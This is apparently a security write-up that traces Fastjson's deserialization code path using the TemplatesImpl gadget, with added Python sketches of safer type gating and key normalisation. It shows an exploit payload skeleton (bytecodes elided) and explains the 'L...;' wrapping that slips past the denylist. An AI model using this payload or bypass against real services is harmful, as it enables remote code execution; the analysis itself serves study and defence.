Fastjson Deserialization Parsing Flow Analysis (Using the TemplatesImpl Bytecode-Loading Process as an Example)


Table of Contents

  • Preface
  • Flow Analysis

Preface

There is not much to say about TemplatesImpl loading bytecode; I have written about it before, so look that up yourself, or read other people's writeups online. As for why I picked this one: most of the steps in the parsing process appear in it, except for `$ref`, so it is fairly comprehensive.

Flow Analysis

Core code

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;

public class test1 {
    public static void main(String[] args) throws Exception {
        // @type selects the class to instantiate; _bytecodes carries the Base64 class bytes (elided here);
        // _outputProperties is what later triggers getOutputProperties() during deserialization.
        String payload = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\"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\"],'_name':'a.b','_tfactory':{ },\"_outputProperties\":{ }}";
        // SupportNonPublicField is required so that the private fields above are populated.
        JSON.parseObject(payload, Feature.SupportNonPublicField);
    }
}

`JSON#parseObject()` calls `DefaultJSONParser#parse()`. When `DefaultJSONParser` is instantiated, the input data is wrapped in a `JSONScanner` instance, and the `features` configuration is passed in at the same time.

[Screenshot omitted]


The remaining parameters are then set.

[Screenshot omitted]


Continuing on, let's look at what `JSONScanner` does.

[Screenshot omitted]


It first calls the parent class constructor, obtains the input and its length, and then calls `next()`.

[Screenshot omitted]


The logic is simple: keep advancing one character at a time until the end of the string.

[Screenshot omitted]


Back in `DefaultJSONParser`: because the first character is `{`, `token` is set to 12.

[Screenshot omitted]


`DefaultJSONParser`'s `parse` method is then called, with the global configuration passed in.

[Screenshot omitted]

This includes the blacklist and similar settings.

[Screenshot omitted]

Since `token` was set to `12` earlier, this branch is taken.

[Screenshot omitted]


A `JSONObject` is created; it is backed by a HashMap.

[Screenshot omitted]


Then `DefaultJSONParser#parseObject(java.util.Map, java.lang.Object)` is called to do the actual parsing.

[Screenshot omitted]


Next it reads a character and checks whether `ch == '"'`. If so, it reads the key, `@type`, and immediately checks whether `key == JSON.DEFAULT_TYPE_KEY`; `JSON.DEFAULT_TYPE_KEY` is exactly `@type`.

[Screenshot omitted]


Reading `@type`:

[Screenshot omitted]


The comparison:

[Screenshot omitted]


Next `loadClass` is called.

[Screenshot omitted]


Here we also see the little trick mentioned earlier for getting past the blacklist: wrapping the class name in `L` and `;`.

[Screenshot omitted]
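To make the point of the `L...;` wrapping concrete from a defender's side, here is an added example; it is a simplified model written for this page, not Fastjson's own code. It contrasts a gate that consults a denylist on the raw `@type` string and unwraps the descriptor only afterwards with one that canonicalises the name first and then applies a deny check plus an explicit allowlist. `DENY_PREFIXES`, `ALLOW_PREFIXES` and the sample JSON are constructed for illustration; the only real class name used is the one from the page's payload.

```python
# Added example (not Fastjson's code): a simplified model of an autotype gate that
# contrasts two orderings of "denylist check" and "descriptor normalisation".
# DENY_PREFIXES and ALLOW_PREFIXES are constructed samples, not Fastjson's real lists.
import re

DENY_PREFIXES = ("com.sun.",)
ALLOW_PREFIXES = ("com.example.dto.",)


def strip_descriptor(name: str) -> str:
    """Model of descriptor unwrapping: 'Lpkg.Cls;' becomes 'pkg.Cls'.
    Loops so that repeated wrapping ('LLpkg.Cls;;') is removed completely."""
    while len(name) > 2 and name.startswith("L") and name.endswith(";"):
        name = name[1:-1]
    return name


def gate_check_then_normalize(type_name: str) -> bool:
    """Fragile ordering: the denylist sees the raw @type string, and the
    descriptor wrapper is only removed afterwards, at class-loading time."""
    if type_name.startswith(DENY_PREFIXES):
        return False
    canonical = strip_descriptor(type_name)  # too late: the decision was already made
    return canonical != ""


def gate_normalize_then_check(type_name: str) -> bool:
    """Hardened ordering: canonicalise first, deny on the canonical name, and
    accept only names under an explicit allowlist (default deny)."""
    canonical = strip_descriptor(type_name)
    if canonical.startswith(DENY_PREFIXES):
        return False
    return canonical.startswith(ALLOW_PREFIXES)


def flag_suspicious_type_values(json_text: str) -> list:
    """Detection helper: return every @type value whose raw form differs from
    its canonical form, i.e. values that carry descriptor-style wrapping."""
    found = []
    for raw in re.findall(r'"@type"\s*:\s*"([^"]*)"', json_text):
        if strip_descriptor(raw) != raw:
            found.append(raw)
    return found


if __name__ == "__main__":
    # Constructed sample: the class name from the page's payload, plain and wrapped.
    plain = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"
    wrapped = "L" + plain + ";"
    for name in (plain, wrapped, "com.example.dto.User"):
        print(f"{name!r}: check-then-normalize={gate_check_then_normalize(name)} "
              f"normalize-then-check={gate_normalize_then_check(name)}")
    print(flag_suspicious_type_values('{"@type":"' + wrapped + '","x":1}'))
```

The design lesson is the ordering: any string transformation that happens after a security decision (here, unwrapping `L...;` after the deny check) reopens the decision, so the check must run on the canonical form, and a denylist alone is weaker than an allowlist of the types the application actually expects. The `flag_suspicious_type_values` helper is the kind of cheap signal a WAF or log pipeline can raise on request bodies.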


Next our class is loaded and returned.

[Screenshot omitted]

Next the deserialization itself is carried out.

[Screenshot omitted]


Now let's look at how `_outputProperties` is turned into `getOutputProperties`; the key part is the `smartMatch` process.

[Screenshot omitted]


Here the underscores are replaced with the empty string.

[Screenshot omitted]
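The following added example models the two-stage key resolution described above, so the mapping from `_outputProperties` to `getOutputProperties` can be traced step by step. It is written for this page and is not Fastjson's code: stage one is an exact field-name match, stage two is a smartMatch-style comparison that drops `_` and `-` and ignores case. The member lists `SAMPLE_FIELDS` and `SAMPLE_ACCESSORS` are constructed samples modelled on the keys in the page's payload (`setExampleValue` is invented); the real implementation's extra cases, such as `is`-prefixed boolean properties, are deliberately not modelled.

```python
# Added example (not Fastjson's code): a simplified model of two-stage key resolution.
# Stage 1: exact field-name match.  Stage 2: smartMatch-style comparison that drops
# '_' and '-' and ignores case, against both fields and accessor-derived properties.
import re

# Constructed sample bean, modelled on the members the page's payload targets.
SAMPLE_FIELDS = ["_bytecodes", "_name", "_tfactory"]
SAMPLE_ACCESSORS = ["getOutputProperties", "setExampleValue"]  # setExampleValue is invented


def property_name(accessor: str):
    """Bean property implied by a getter/setter name: getOutputProperties -> outputProperties."""
    for prefix in ("get", "set"):
        if accessor.startswith(prefix) and len(accessor) > len(prefix):
            rest = accessor[len(prefix):]
            return rest[0].lower() + rest[1:]
    return None


def smart_key(key: str) -> str:
    """smartMatch-style normalisation of a JSON key: strip '_' and '-', lowercase."""
    return re.sub(r"[_-]", "", key).lower()


def resolve(key: str, fields, accessors):
    """Return ('field', name) or ('accessor', method) for the member the key reaches,
    or None when nothing matches."""
    if key in fields:                      # stage 1: exact match
        return ("field", key)
    wanted = smart_key(key)                # stage 2: normalised comparison
    for f in fields:
        if smart_key(f) == wanted:
            return ("field", f)
    for m in accessors:
        p = property_name(m)
        if p is not None and smart_key(p) == wanted:
            return ("accessor", m)
    return None


def resolve_all(keys, fields, accessors) -> dict:
    """Map every JSON key of an object to the member it reaches (None if unmatched).
    Useful in code review to see which spellings of a key can reach a given member."""
    return {k: resolve(k, fields, accessors) for k in keys}


if __name__ == "__main__":
    sample_keys = ["_outputProperties", "_bytecodes", "output-properties", "unknownKey"]
    for k, member in resolve_all(sample_keys, SAMPLE_FIELDS, SAMPLE_ACCESSORS).items():
        print(f"{k!r} -> {member}")
```

The practical takeaway for reviewers is that the JSON key and the Java member name do not have to be spelled the same: `_outputProperties`, `output-properties` and `OUTPUTPROPERTIES` all reach the same getter under this normalisation, so any allowlist or filter applied to raw key names must be built against the normalised form.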


That answers the question raised above. The rest needs no further explanation; just look at the call stack.

[Screenshot omitted]

